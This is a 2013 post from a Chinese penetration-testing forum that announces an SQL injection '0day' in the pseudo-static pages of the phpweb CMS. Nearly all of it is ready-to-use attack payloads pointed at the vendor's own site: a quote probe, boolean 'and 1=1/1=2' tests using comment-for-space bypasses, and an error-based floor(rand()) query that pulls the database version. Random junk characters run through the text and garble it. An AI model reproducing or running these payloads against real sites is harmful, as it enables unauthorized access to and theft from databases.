中国网络渗透测试联盟

标题: phpweb伪静态页面注入0day [打印本页]
作者: admin    时间: 2013-1-4 19:46
标题: phpweb伪静态页面注入0day
phpweb所有的整站程序伪静态页面都存在sql注入6 V% g% I$ ?, U: t3 n

# n$ d# P8 y  T& `9 c" k主站:http://phpweb.net/$ B* y+ l: C7 y# I( l
加’检测:( f; K5 Z( f/ _6 g+ u6 I1 f. F

. I, p" ?) V# _& [6 ~2 f: h5 qhttp://www.phpweb.net/down/html/?772′.html2 j* K/ n, Y- ^1 y( m( ]7 v/ w
- M8 ]( W/ I1 `( H* Q
出错6 ?/ o7 B+ t2 e
存在注入。
  D/ F9 Z7 s2 |  ?" Q- a* ]8 Y不能用空格,只能用/*罗, c# F. }6 l& A: J7 N& R
http://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常
9 Q/ `- ^* Z% i
; i9 x$ E4 t+ {* x1 V' X: T* f/ {/ [http://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错./ J$ E0 o7 g9 A! D0 `+ e! S
爆数据库版本:
% A4 [) |  g6 ]. h( D' Q& W/ U7 A3 ~9 N
' D  W, M$ Q. q+ G3 p2 y* \?. k( u9 q8 }& N" Z
1# f- Y6 }4 F$ F2 \
http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html2 ]/ q9 o/ U( U, L, a1 `
更新日期: 2013-01-03 13:39:50        
2 `) D" h) I3 ]" [: c' R1 J0 m% B



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2